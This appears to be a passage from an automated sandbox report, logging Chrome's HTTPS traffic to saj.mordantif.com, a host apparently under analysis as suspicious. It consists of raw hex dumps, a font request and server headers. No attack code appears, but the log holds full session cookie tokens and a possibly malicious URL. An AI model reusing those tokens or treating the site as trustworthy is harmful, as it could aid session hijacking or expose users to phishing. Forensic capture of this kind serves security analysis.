                                                        2024-09-13 13:07:06 UTC1369INData Raw: e5 9f fb 06 4b 68 b0 50 00 7c 22 4d 93 ae 4a 51 a6 00 02 1a e0 df 3f 60 01 fc 53 40 7b df ed 6f 97 f6 52 6a 43 45 a1 71 78 8f 70 92 21 28 57 69 9f a4 1b eb 64 59 b5 25 ff 2f 72 f2 23 13 70 04 e7 43 20 15 c4 93 e2 e9 00 00 81 82 83 f3 72 1e 6f 34 50 f1 7d e4 e6 7f 33 58 92 99 5d 88 fc f3 a2 d4 ae 01 36 f2 9e 27 7e 26 b0 d3 c0 5d b7 b4 a7 2a 79 09 f4 8f b6 ff 59 51 82 a7 39 e1 22 76 b7 c3 17 cb 33 f0 af 90 a0 d9 6f 45 4d 51 6f 57 4d 16 57 60 cc 85 de 1f 9a 8a 01 13 c4 07 db cc a4 0e 94 94 10 82 59 08 56 81 8a 4f 32 11 7f ee f1 f8 f4 6c 83 02 c7 ac 9d 70 01 31 87 f4 42 a5 c2 bf 46 6e 0e 7f 6f 10 3c d0 ab a8 2c 43 8f f7 0f fd 97 f8 5e c0 59 e6 43 00 b6 fe 57 ae e9 b6 74 58 e2 11 7c a8 60 d2 a6 bc 97 35 3a f7 59 64 40 5d e5 12 6a 18 bb 24 b6 dc ca 76 b6 2a 43
                                                        Data Ascii: KhP|"MJQ?`S@{oRjCEqxp!(WidY%/r#pC ro4P}3X]6'~&]*yYQ9"v3oEMQoWMW`YVO2lp1BFno<,C^YCWtX|`5:Yd@]j$v*C
                                                        2024-09-13 13:07:06 UTC1369INData Raw: ad 68 65 68 64 9a cf 32 9d 4d e7 8a 0a 96 48 c8 6c 22 d8 b5 a2 1b ed 62 bc b1 36 52 21 05 95 14 c7 81 94 35 dc bc 61 7e c1 b4 7a 90 11 b4 ca 1d 10 b9 22 0a 08 40 c0 9b 31 90 dc 27 05 17 40 40 05 00 50 85 55 b6 46 4e 76 17 a1 cf f8 91 28 18 bc 86 dd 28 8a 0d 6e 1d 26 6e 7d 95 e8 90 58 8c 91 02 38 4a a0 94 87 e5 5a 50 e2 4c bc d0 25 06 2b 80 8c c4 05 99 9c 71 86 d8 29 ca 83 fb a6 88 8f df 77 45 f5 08 aa 72 b3 dd 04 90 49 e7 01 a0 73 40 15 14 14 29 cb f1 82 58 04 82 31 5a 02 29 dc 92 31 91 53 51 02 a6 fa 29 2a 80 d8 45 b8 e5 49 0f 90 d8 00 4a f9 09 a8 6e 75 4c 81 89 2f 00 77 7d b0 d2 75 b4 ea 9a ae 67 98 3e 3c 14 be 13 55 48 55 f9 1e 60 2e ed fc 69 cf da b5 42 06 20 96 20 07 60 a8 05 c2 4c f9 e3 9b e0 38 ab d1 83 9b 3a 8b 85 5e ca a3 dc 75 85 2b e0 30 ac 55
                                                        Data Ascii: hehd2MHl"b6R!5a~z"@1'@@PUFNv((n&n}X8JZPL%+q)wErIs@)X1Z)1SQ)*EIJnuL/w}ug><UHU`.iB `L8:^u+0U
                                                        2024-09-13 13:07:06 UTC1369INData Raw: 21 bc 9b c0 9e 39 aa 76 68 dd 8c 5b 2f 6b 9f 1d b3 c9 cf 85 80 7e 4d 7d 1c 44 b5 56 8e d5 c6 7d 25 c4 02 3b 1b 15 6b 50 8d 7e cb ba 24 26 a5 bb 63 d1 11 53 27 2b df 09 8c 31 2c f4 05 2d 8e 9d 58 08 42 45 de 45 e3 4e a2 83 07 5d cd 4a 33 e0 b5 97 e1 ae c5 ad d6 f0 84 e2 b0 3c c6 03 e7 41 3f 7a 78 70 cc 8c 76 2e 02 cf b0 85 b1 bb 8b 6f c8 80 02 d5 9e 4a 0a a0 e3 4b b7 9b 9f c2 a6 10 af 98 9a 67 7a 8f e4 ad 45 d1 58 cc 2e ad 55 97 e2 39 c3 32 ea cd 24 ff 27 7b 73 5b b5 87 25 e3 73 aa 4d 39 f0 18 1c e6 1b 82 af d3 ba d2 3c 76 ce 79 bf b0 50 9d c3 58 69 34 3f af 43 4d 37 3b 6c 0d ce 6f 77 95 ec 53 d8 54 86 b1 6d 91 2a 74 76 a0 4a b1 bf 18 8f 94 7e cf d7 cf f4 a0 5e 55 14 0e 79 da 72 32 2d 41 57 0e 69 b4 3f 77 7c c5 7f e3 8f 3f 86 9b ff 3b dd 9e 48 b6 50 f6 da
                                                        Data Ascii: !9vh[/k~M}DV}%;kP~$&cS'+1,-XBEEN]J3<A?zxpv.oJKgzEX.U92$'{s[%sM9<vyPXi4?CM7;lowSTm*tvJ~^Uyr2-AWi?w|?;HP
                                                        2024-09-13 13:07:06 UTC1369INData Raw: 80 54 9b eb 9f 00 6a 07 4d d1 ff 28 8b fc 6c d2 51 9d 0e 83 9d 22 5c e7 48 fc 92 05 99 2d cc c3 68 90 eb c1 5c 1c b1 24 18 71 2e 08 a3 6c db c7 5b cb 58 47 63 ba 7c 3d 91 9d bf 11 44 11 fd a1 6b 70 7b ee c6 de 50 49 44 db ef aa dc 2c 43 d6 77 cc 1f aa ac 43 7b cb 87 68 e6 c2 24 ef 71 39 38 ea ca 50 a1 dd a1 b9 16 af e7 5b 36 1a a3 68 7d b7 d1 9b 19 9e 1c 5e da b3 75 d6 19 24 b3 60 d0 95 e7 b7 0d b0 2c 6e a1 9e a0 81 cf 5d 0e 63 53 f1 46 00 2f bb fe 1f 70 a5 9e 58 1d 8b e9 75 3b 36 ba 42 6c 18 29 19 db c5 7e 29 4e 35 47 ef 03 d3 11 c4 6b cc 5c b2 8c 98 87 f1 b4 13 7a 4a eb 68 53 1d d1 cd 11 38 50 f8 a2 27 ad a6 67 78 4b 59 17 a6 07 71 e0 18 1c 10 0b 1d 4d 5f a1 68 c3 41 66 ce 84 77 dd 8c a7 e9 0d 2d 3e d3 90 90 f7 e2 a7 6d b2 50 7a fd 83 9e 09 59 ba 40 ff
                                                        Data Ascii: TjM(lQ"\H-h\$q.l[XGc|=Dkp{PID,CwC{h$q98P[6h}^u$`,n]cSF/pXu;6Bl)~)N5Gk\zJhS8P'gxKYqM_hAfw->mPzY@
                                                        2024-09-13 13:07:06 UTC1369INData Raw: e7 ed 03 c0 64 f5 67 15 d4 4b a0 1c 83 ae 60 ec ae 01 51 24 52 a8 17 ec d7 e5 02 86 d6 f7 93 a3 02 4c fd 08 2e 8c 51 67 00 58 f0 b7 dd 29 00 ab bc b1 63 95 3a c0 e5 1b 8e 84 eb 18 37 bb ef 5b d7 78 fc 7d eb 19 6f bf 0f 7d 63 b3 00 00 20 24 28 4c 1c 20 c3 ee 31 20 a1 ae 01 e7 67 65 60 3c ab 00 96 58 09 ac 4a bb 44 03 43 dd 38 d9 f3 a2 2b cd a5 b3 5c 2d 6b ac c0 93 b0 6f fd 3a 04 fd 22 2e c2 be 55 37 a0 58 93 20 c4 cf 40 e9 fe 01 ff a3 bf 02 54 df f1 8b 37 d2 18 b9 b2 03 8d 66 21 96 60 25 57 88 a6 3f f3 e8 ee 9c 1a f8 ec 5f 95 a3 57 af 34 dc c0 f6 14 72 54 dc 81 7e 73 3e 7a 37 c6 fa dd 84 b2 82 b7 a0 7a 70 7b fd bf 42 d0 4f eb 28 a4 30 55 01 23 24 61 8a 97 2a 35 0e da f7 f4 cd 10 22 2c 42 aa 28 31 81 9a 39 89 24 32 0a 29 54 d2 64 c9 91 a7 40 89 a2 74 11 35
                                                        Data Ascii: dgK`Q$RL.QgX)c:7[x}o}c $(L 1 ge`<XJDC8+\-ko:".U7X @T7f!`%W?_W4rT~s>z7zp{BO(0U#$a*5",B(19$2)Td@t5
                                                        2024-09-13 13:07:06 UTC1369INData Raw: 6d 8b 0c 04 3f 40 60 4f 3c e0 20 be 10 e4 01 3d a8 7d a6 28 9b 38 a1 c5 64 57 74 3d ec 7f 7d 08 26 bd 16 95 ea 5b 16 b0 5d d2 de b5 6e b9 e3 ae 7b 6e 6b 72 28 f0 1d 1b 15 eb 74 db 4d 9d ae bb 2f 4e a5 f6 c0 61 4c 1d c7 6e b4 0c 4d bd 43 5d 9c ee 65 37 b8 ea ff 8d 8b ca 96 bb eb 56 d5 5a 4d 90 d4 e4 b5 76 87 e4 8d 45 7d 9a 48 7b 15 e0 5a c2 73 b4 ee 2e be 04 f8 b4 7e c7 da 3d f4 f5 ed 7a 5a 3f ac 25 b2 36 32 5a f6 5f c0 4a 1d ff a4 c9 f4 bf f6 4f f8 3a c0 5c 92 fa 51 9c be bf bc 3e 88 6f 28 0a 9c e4 45 91 5e ff 83 f9 e0 35 e2 f6 53 a6 99 64 a7 9e 68 3c 39 c1 74 f8 af 2d f4 6b e8 e9 d0 0e 42 8c e0 02 a8 36 9f 40 50 6b 72 08 44 df 89 c3 a0 23 f1 be 82 8f 9f a6 6c c8 ea e2 70 81 d8 e7 08 a7 65 e7 73 8e 16 c3 78 1e d8 5f dd 27 48 e7 20 ba 7f 9a bb 53 d4 32 c3
                                                        Data Ascii: m?@`O< =}(8dWt=}&[]n{nkr(tM/NaLnMC]e7VZMvE}H{Zs.~=zZ?%62Z_JO:\Q>o(E^5Sdh<9t-kB6@PkrD#lpesx_'H S2
                                                        2024-09-13 13:07:06 UTC1369INData Raw: bf e2 c7 1c f6 cf 7b e2 5f aa f0 6f 0a fc 99 a3 fe 7b 4f fc 4f 15 fe 4f f1 7a c1 4f 5d c3 5e e8 fa 49 b7 d0 0e 70 d3 ad 1f fb c9 d3 33 05 10 1c 9c 8f f4 d8 f9 ab 65 5f 2e 9e fa 31 5c 0f 80 47 2e 03 e8 af 1b ab 78 90 19 8c 5c 3d 16 50 9e 10 aa b7 bb f1 96 e9 e8 50 5a 57 99 89 cb 42 8c 4f a5 c6 83 b0 72 71 d2 e9 5c 2c 8d e9 08 ac 4c 5d e9 e1 2a 2c 52 ba 08 9f 4a 8e 07 a1 28 86 32 a7 dd c8 b8 a8 8b 07 a7 74 ba 73 43 a8 e0 ea ca f2 67 58 b7 fe e2 8b 5d 0d dd c5 61 5a 55 59 9a 0f cd a5 7c b3 55 ed 6b 08 d9 3e 2e e8 14 eb a1 c6 2d 23 31 06 d3 5c 07 73 91 a5 48 f6 10 c2 65 09 59 44 d5 32 9e c2 c0 67 88 49 29 63 f6 60 86 66 ae f7 aa d0 58 94 7c 06 f4 ab 58 8e d0 72 36 8b 19 fb d1 96 1d 44 50 d7 90 6d 47 b6 20 cc 83 76 4d b5 21 b9 79 ec 7d 89 41 6e 78 78 e8 81 87
                                                        Data Ascii: {_o{OOOzO]^Ip3e_.1\G.x\=PPZWBOrq\,L]*,RJ(2tsCgX]aZUY|Uk>.-#1\sHeYD2gI)c`fX|Xr6DPmG vM!y}Anxx
                                                        2024-09-13 13:07:06 UTC1369INData Raw: 4d eb 35 d1 e1 80 1c 69 5d bf cc a1 e8 ac ef 3b f9 0a 24 ed 13 15 ac 4d 28 6d ea 7c 96 81 ad 6b 76 cb f2 ea 9a 98 e8 b3 84 7a ce d7 ad d3 1a f7 5d b8 96 7f e0 ef fb 3e d2 ff 10 71 be 45 2d 8d b5 93 2a 9f 2a fe 87 98 cc f7 1a 0f e6 a6 af f9 2b 26 34 d7 d6 39 10 09 be 2e 9e f0 d4 8e 33 b4 8b 19 e5 a9 9d 73 66 58 9e dc dc f7 04 ae e0 53 fd d4 74 7f cd 9a 76 7c 53 74 7a b8 41 07 9a 43 e8 66 29 ea 9d 9e 9c 9f 60 5e dc a2 67 a2 89 2e 8a 3d 6a 11 03 df b2 c3 35 2d db bf 54 8e 2c e8 63 02 b6 b6 82 1f 1e 48 3c 04 3a 4d 54 d0 ba 1b 7f cf 00 55 2a 7c 3c 7a f7 c0 a9 d4 3c 3a e4 66 3e 91 cb 46 cd d4 3b 3d 5e 7c 75 77 09 fc 80 de 6b 83 b1 31 20 03 f7 52 5b 17 79 79 fc fa e3 c7 fe 67 66 0b 87 1e ce e4 67 4f 5f 86 a5 da ce f5 c1 0b 83 57 1e 81 d4 75 41 77 3a b7 59 8b b0
                                                        Data Ascii: M5i];$M(m|kvz]>qE-**+&49.3sfXStv|StzACf)`^g.=j5-T,cH<:MTU*|<z<:f>F;=^|uwk1 R[yygfgO_WuAw:Y
                                                        2024-09-13 13:07:06 UTC1369INData Raw: e6 8f 03 0a 13 5b 7c 11 96 dd 39 50 c7 5c e8 b6 f3 ef e1 f8 f4 af 76 d7 04 6c a5 5b 5e a5 1f 82 e5 c8 48 75 02 05 a3 99 05 4b 0b cf 39 99 9b 44 e9 29 d2 4f e0 4d 76 5e eb d9 c9 2a 51 3c d3 98 aa 7e 11 1f 98 ae d2 2b d3 a4 f9 9a 0c b7 3d 84 70 b2 dd be ff 15 fd d3 ca ed c7 5a e4 3b 4f 4d 7e fe de f7 38 7c 59 78 f5 45 72 48 c9 b4 a5 47 d1 4f d6 15 62 27 b3 8b 70 d3 fa a2 3e a2 bc 65 ae 08 dd f4 4c 26 b8 0e bb 11 81 6e 8c ee b3 4e 29 73 93 b2 4d 47 db 14 36 f3 fd ef 69 4c 75 77 3d d1 4d 84 97 19 e8 a7 6b fe ff f9 e1 fa fd 4c a2 2c c7 1e 8d a7 96 3f 2a d7 8f 3f 1f 03 bf fd da ba fb e8 7b 75 c5 a3 0a fe 9a ef 16 b0 ec ef b4 ce b9 94 ed 47 9b 64 db 4f 4d ac 65 d4 fc 88 ba 28 3c ff 22 39 a2 6a b1 ac 41 de 47 d1 17 e3 ce e4 66 86 cf a8 ea 07 b9 46 7e 13 54 1d 4f
                                                        Data Ascii: [|9P\vl[^HuK9D)OMv^*Q<~+=pZ;OM~8|YxErHGOb'p>eL&nN)sMG6iLuw=MkL,?*?{uGdOMe(<"9jAGfF~TO


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        44192.168.2.549781172.67.148.274433624C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-09-13 13:07:05 UTC1396OUTGET /12KYWgiq1CIPJtcA56dot1AeMqr50 HTTP/1.1
                                                        Host: saj.mordantif.com
                                                        Connection: keep-alive
                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                        Origin: https://saj.mordantif.com
                                                        sec-ch-ua-mobile: ?0
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                        sec-ch-ua-platform: "Windows"
                                                        Accept: */*
                                                        Sec-Fetch-Site: same-origin
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Dest: font
                                                        Referer: https://saj.mordantif.com/RTOGZZBDODKFRWTTVU5W0HM2Y143SY2BLP11CI?fygndawgjewqbrrl267129585769599075856O5CEBFHBXCG6YJORF6T
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        Cookie: XSRF-TOKEN=eyJpdiI6ImdrN0plVFEwV1RCUnFILzFsK29BaGc9PSIsInZhbHVlIjoiOHFGZmQvNEljS2lITTVOUUJJc3FReG9FREt1dWQ5dnBGOFVZMTBMNVJoUnM4ZGcrSXl6TFBwTHozOGlvcXVmaENqYjlPRTZTbDkwUUpEVmx1dGQvSUhVejZwKzdiMDg5V0wwa2JVd21lZkNodTczMGU2SkNMRXNPRk5wcXZtamkiLCJtYWMiOiIyNjE2MzEzM2EyN2JmNzE2MTVmM2Y0MTg0NWZkM2ZhYjdmN2M3M2Y4N2QxY2Q1NTkzZmNkZDI5NDU3OTBiZDE1IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlE5NUtFUmJoa1g2VmJ5amxYK0dWOXc9PSIsInZhbHVlIjoianU1aDJhQ2twSG5VY21XSVFlbDMvQUNkUnk5MFZpWGdjNnZ1TTNyRHB0VlNQSjA3U09tTFpqMVZHVVNjdm9wSGNLZGRVbUZsREF4ZWdWaUtNdXFUWFRDLzllVUVJLythNHY3TVdUcUN3ekdXakV2d0pKSkViQm1KVW5OYjdQRWEiLCJtYWMiOiIxNzQzMDQwYzFlNjM5ZWZlMGI4NzQwN2NlMGY4Njk1NDliZjdjNWU0OGYzZWNiYWJmZDgyZWQzYzg3ZDQ3MDFlIiwidGFnIjoiIn0%3D
                                                        2024-09-13 13:07:06 UTC631INHTTP/1.1 200 OK
                                                        Date: Fri, 13 Sep 2024 13:07:06 GMT
                                                        Content-Type: font/woff
                                                        Content-Length: 35970
                                                        Connection: close
                                                        Content-Disposition: inline; filename="12KYWgiq1CIPJtcA56dot1AeMqr50"
                                                        CF-Cache-Status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qgshgeqZcl1MijGZu0BAWsv%2B3Is%2B%2FDGQxA6ADWz6It6u8PLSso%2B4Thg84BRr%2FNIU94bptje2G6xRakSLnldTTm61z2KyDin3Yg86ZM6gwdl%2BgJ5ze%2FydXT6fUozwwA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        alt-svc: h3=":443"; ma=86400
                                                        Server: cloudflare
                                                        CF-RAY: 8c285bb7dccf32fa-EWR
                                                        2024-09-13 13:07:06 UTC738INData Raw: 77 4f 46 46 00 01 00 00 00 00 8c 82 00 11 00 00 00 01 24 20 00 01 00 00 00 00 8b 5c 00 00 01 26 00 00 02 93 00 00 00 00 00 00 00 00 44 53 49 47 00 00 8b 54 00 00 00 08 00 00 00 08 00 00 00 01 47 50 4f 53 00 00 01 80 00 00 17 df 00 00 4e b6 ed 42 8f b9 47 53 55 42 00 00 19 60 00 00 02 ad 00 00 04 96 8c 33 79 b9 4f 53 2f 32 00 00 1c 10 00 00 00 46 00 00 00 60 69 c3 7b 5b 63 6d 61 70 00 00 1c 58 00 00 05 1a 00 00 07 3c 97 3f 2b 12 63 76 74 20 00 00 84 dc 00 00 00 2f 00 00 00 3c 29 81 01 c0 66 70 67 6d 00 00 85 0c 00 00 05 c1 00 00 0b e2 3f ae 1b 9f 67 61 73 70 00 00 84 d4 00 00 00 08 00 00 00 08 00 00 00 10 67 6c 79 66 00 00 21 74 00 00 52 61 00 00 9d a4 24 e0 b2 69 68 65 61 64 00 00 73 d8 00 00 00 33 00 00 00 36 1b 16 7d b8 68 68 65 61 00 00 74 0c 00 00 00
                                                        Data Ascii: wOFF$ \&DSIGTGPOSNBGSUB`3yOS/2F`i{[cmapX<?+cvt /<)fpgm?gaspglyf!tRa$iheads36}hheat
                                                        2024-09-13 13:07:06 UTC1369INData Raw: f5 f4 1a 6d a0 b7 e8 1d ca a7 02 da 41 45 b4 8b f6 d2 01 fa 90 4a e8 10 1d a6 06 6a e2 04 f6 b2 8f bb 71 26 5f c6 d7 f2 60 be 81 87 f0 50 be 91 87 f1 4d 3c 9c 6f e6 5b f8 56 1e c1 b7 f1 48 1e cb 53 78 3a cf e0 99 3c 8b 67 f3 1c 9e cb f3 78 3e 2f e0 85 bc 88 17 f3 12 5e ca cb 78 39 af e0 95 bc 8a 57 73 2e e7 f1 26 de ca 85 bc 93 8b 78 0f 17 13 f3 6a 55 4a a9 94 ae 42 d4 53 9d a7 1c 32 28 5f b5 d0 01 55 c7 d3 d5 51 9e a1 82 3c 87 e2 79 ae 6a e6 79 d8 e7 ab f3 bc 50 85 78 b1 3a c5 cb d0 b6 02 6d 2b b1 af 56 d5 fc 8a aa e5 35 68 5b 8b 7e 45 b8 57 4c dd e8 72 70 c0 07 1e f8 30 ea 19 2a 50 75 18 f9 24 4f 41 af e9 94 86 d1 b7 f1 4c 4a e1 59 e4 e5 d9 e4 e1 39 18 65 ae da 02 4c b5 c0 14 02 a6 20 2f 22 3f b0 6d e1 a5 94 08 8c 8d bc 1c bf 2b f0 cc 4a ec ab c8 00 e6
                                                        Data Ascii: mAEJjq&_`PM<o[VHSx:<gx>/^x9Ws.&xjUJBS2(_UQ<yjyPx:m+V5h[~EWLrp0*Pu$OALJY9eL /"?m+J
                                                        2024-09-13 13:07:06 UTC1369INData Raw: 4d b5 3f 83 6e c2 97 42 2f 35 de 74 d3 5e f4 39 ff 11 7a a1 e7 db 00 aa 6a 1d 19 56 5a 57 86 48 dc 00 97 0c cb df 06 44 32 47 d0 be cf d6 47 e1 40 dc f0 9f e8 bc ef e6 e4 11 eb e1 13 bf 8f ec f1 0c fa c6 ab 90 aa 27 03 73 ec a2 5a 00 90 2e ee 04 71 d6 a8 af e9 82 6f 6a bb 7a 16 de dd 07 09 27 ab 4f 54 b9 aa 55 cd aa 5a fd 45 2d 01 d5 75 ea b0 3a a3 3e a3 38 d5 a4 ce 83 de 7c d0 df 97 52 70 75 94 92 c0 9f d8 51 f9 02 a8 d4 bf 0d 42 5d 85 3a 41 99 ea 04 a8 1d 40 1e 50 59 8d a6 7b cc dc 9e fc 2d 41 9c 5d 4e 7e e1 ae 81 59 7d 09 c9 c5 66 eb 02 ac d5 ea 24 f2 9c 78 a1 06 76 01 ed 20 75 4a f3 4a 73 10 96 d3 c5 99 53 50 7e d2 e5 2c 1e 67 be 18 f1 f2 a0 3a 07 1a 6b d4 11 70 26 01 60 40 f6 04 e9 96 a1 d1 83 3c d3 03 30 a4 9e 21 58 2e b9 e8 f5 4a d5 14 1b 2a b7 a9
                                                        Data Ascii: M?nB/5t^9zjVZWHD2GG@'sZ.qojz'OTUZE-u:>8|RpuQB]:A@PY{-A]N~Y}f$xv uJJsSP~,g:kp&`@<0!X.J*
                                                        2024-09-13 13:07:06 UTC1369INData Raw: 90 4b bd fe 06 46 7b 14 75 5a 7d ac de 52 27 f5 1a 9c 39 86 da a5 f6 aa 77 20 cb 62 68 0f 34 06 da 9b 6d cb 57 8e 1f aa b3 6a 87 ab 1a 2d 95 b7 c3 cd ea 20 ec e4 20 e4 58 62 d2 a1 73 2d f1 c6 01 8c ad b5 af 0c 39 56 10 ed a5 c0 9e 8a b3 24 f8 b3 0c f5 67 3c dd 1c d1 67 f8 61 5f 6f 80 8a a5 f0 7d 7e b1 da 06 f4 6d c1 dd 15 e4 87 9e 7f a2 df d2 6b 3f 0a 7c 59 82 eb 55 1a 8e e3 93 ba 16 47 b5 11 ef f0 ef 6d 8b 2b d5 ea 7e 3c b9 4e 7f c7 25 1e 2d e8 5a 17 09 60 fe 86 9a a4 72 25 2f e8 02 2b db 4d 37 e8 55 27 f5 38 65 ab 0f 1d 9a da 48 4c 4b 16 fe e6 a4 da 6f 71 df a0 ae 62 b9 65 ed bf c4 41 e5 d1 d0 46 b6 ae f5 10 75 5c 1d 06 cf fc a6 15 68 2a ac 9c da bd 26 1f f6 56 49 be c2 33 cf f4 db d8 52 bd 9e a6 69 8f 20 71 d3 03 9d 50 07 1c 1f 60 98 39 7c c4 bc 3e 14
                                                        Data Ascii: KF{uZ}R'9w bh4mWj- Xbs-9V$g<ga_o}~mk?|YUGm+~<N%-Z`r%/+M7U'8eHLKoqbeAFu\h*&VI3Ri qP`9|>
                                                        2024-09-13 13:07:06 UTC1369INData Raw: a2 73 8d d1 3d 8d ab 6f bb 08 29 71 c1 88 90 33 d7 58 35 64 95 ce b7 a1 21 51 be 30 47 2d b2 0e b5 9e 1d 15 6d 0b c8 96 da fa a0 ca c3 08 65 c8 4a c2 22 b7 ca 90 fe 55 ad b1 5d 3d d7 69 66 d6 59 bb ac 92 9b df 5d b4 59 47 5b a0 d6 a0 36 4b 32 2b 43 f5 17 b3 12 b6 f2 f1 06 e4 bd 46 ab 26 29 ed db 72 c8 f9 8e 27 7c d5 c0 f4 66 7f a5 04 5d b9 a5 ae 07 5d 54 ee 76 a8 3c aa ab 4e c9 d2 8a a4 2a d8 25 df fe 6b 5b 14 2a 5b 9a db fb 4b 97 75 75 4a 65 c4 dc dd 6b 7f c9 2f b5 48 99 53 57 d5 44 fb 7b 1c d4 1d 75 f0 0b a9 e2 ef b2 91 c5 37 80 af c9 ad ef 99 d5 fd 12 21 b2 25 f3 31 35 2c 45 de c5 d4 c9 93 a6 8e a5 09 bf 33 44 e7 bc f2 05 6a 36 20 00 d0 35 76 26 ee 24 8a a7 e9 2f f4 18 f0 41 b5 c0 14 14 2d 0d e8 15 76 e9 d5 5a d5 d6 45 58 cb 6c b1 fc 66 8b 95 ed 35 c3
                                                        Data Ascii: s=o)q3X5d!Q0G-meJ"U]=ifY]YG[6K2+CF&)r'|f]]Tv<N*%k[*[KuuJek/HSWD{u7!%15,E3Dj6 5v&$/A-vZEXlf5
                                                        2024-09-13 13:07:06 UTC1369INData Raw: eb 78 10 65 f1 60 1e 49 c9 7c 3b 8f a6 4b f8 4e be 87 02 3c 86 c7 51 26 a2 09 ec 14 f1 e4 e7 d4 83 a7 f0 14 1a c8 53 79 2a f5 e6 a7 f8 29 4a e2 5f f0 2f 70 fe 34 3f 8d f3 5f f2 7f a2 cf 34 9e 46 5d f9 57 fc 2b 4a e3 67 f8 19 9c ff 9a 7f 8d f3 e9 3c 9d ae e1 19 3c 83 46 f1 4c 9e 49 f7 f0 2c 9e 45 63 78 36 cf a6 2b 79 0e cf a1 7e 88 59 cf 92 0f 51 eb 79 1c e7 f2 5c 1a cd f3 78 1e 0d e0 f9 3c 9f 46 f0 0b fc 5f d4 8d 17 f0 02 1a cc 0b 79 21 dd c0 8b 78 11 dd c6 8b 79 31 8d 44 a4 5b 42 b7 f0 52 5e 4a b7 f2 4b fc 12 8d 47 c4 5b 46 fd 79 39 2f a7 6b 79 05 af a0 eb 78 25 af a4 eb 11 07 57 d1 55 bc 9a 57 eb ff 3b c4 b9 74 35 ff 96 5f a6 cb 10 19 5f a1 3b 78 0d af a1 9b 74 84 a4 e1 3a 42 d2 5d 88 90 9b e8 76 44 c9 cd 74 b3 8e 93 94 a1 63 23 28 dc c1 3b 70 dc c9 3b
                                                        Data Ascii: xe`I|;KN<Q&Sy*)J_/p4?_4F]W+Jg<<FLI,Ecx6+y~YQy\x<F_y!xy1D[BR^JKG[Fy9/kyx%WUW;t5__;xt:B]vDtc#(;p;
                                                        2024-09-13 13:07:06 UTC1369INData Raw: 81 a6 8b 60 a8 e9 52 99 2e 4d 84 e2 4d a6 2f 86 58 3a f1 f7 51 07 8a 8e 96 dd 16 0d 2b 1a 54 94 04 e7 22 8a ea f2 9f 23 98 50 be 0e 0e a6 06 63 83 93 03 e7 82 04 ce 04 7e 0d 14 06 32 02 63 02 ab 8f 3f 75 fc 49 ff 01 7f be 7f 07 f8 73 fc ab fc cb fc 63 fd f1 fe f8 a3 95 4a 9e aa 38 27 ec 40 58 be 75 35 c5 8a 4c 9b 39 e5 af cd 65 0b 47 f9 98 13 7c ad 34 70 06 da 4c 76 52 9c f9 65 db 65 ab 93 e6 2c 71 32 9d 2c 67 8d 93 e3 6c 74 f2 9c 5d ce 1e 27 df 29 70 0e db de 61 e7 b8 f3 31 e7 1d 4e de 3f ea 6c 27 e7 cf 22 c4 ba f4 ae 36 6a b1 f6 e8 4d ad 52 8a 66 6b 9e 36 e9 39 4d d2 34 8d 53 82 86 6a 87 b6 6a a7 66 6a be 5e d5 58 bd a6 17 35 45 dd f5 ba c6 eb 0d 4d d4 0c 2d 51 86 d2 94 ae 09 ca d4 7d 5a a0 85 4a d4 7e a5 aa 9f b2 b4 59 3d d8 a7 95 4a 52 9c 16 69 8c 66
                                                        Data Ascii: `R.MM/X:Q+T"#Pc~2c?uIscJ8'@Xu5L9eG|4pLvRee,q2,glt]')pa1N?l'"6jMRfk69M4Sjjfj^X5EM-Q}ZJ~Y=JRif
                                                        2024-09-13 13:07:06 UTC1369INData Raw: 54 98 41 40 54 be 1d b1 2c 41 1c 79 97 ab 31 c7 11 da 60 1f 5c 11 1e e6 af 33 1a c2 62 c2 63 42 82 74 a1 fe a1 29 51 1a e8 94 ce 90 11 c1 e8 fd 55 ea 80 00 bd bf 37 63 34 e0 8c 2c 4b 66 9c d1 a8 95 de 18 b4 e7 f1 5f 17 9e 58 61 2b 29 ef 5e 51 bc fe dc 90 fd 36 83 e6 2f 1c 5a 74 1b c7 77 0f ae e9 11 3e e5 77 66 b6 ed ae 69 bf 2f 33 fd cc 8a 96 23 83 05 6c 79 fd bc 92 4e e1 a4 fd d1 ae ae a6 7e 61 39 a5 77 d3 e8 6d 7e 35 7f 04 19 50 ba 2d 25 32 c2 db 0b 46 11 97 21 86 c1 cd 80 5e 40 39 c1 b9 99 03 fa 04 a2 0a 8c c2 42 fc 7c 3d dc 90 01 1b 78 b5 7f 12 1f 1d 17 c7 58 32 fd b2 62 cc 19 5c a0 3a 2e ce 18 ed 0d 38 47 30 e6 8c 2c 6b a0 8a 63 b9 87 47 ce 75 b5 9f c5 e8 e8 9f 71 7a dd 97 c9 2f 3f da fe f8 e2 bc fc c1 63 6d f7 5f ce f9 a2 56 b8 ee df f1 32 f6 7e fe
                                                        Data Ascii: TA@T,Ay1`\3bcBt)QU7c4,Kf_Xa+)^Q6/Ztw>wfi/3#lyN~a9wm~5P-%2F!^@9B|=xX2b\:.8G0,kcGuqz/?cm_V2~
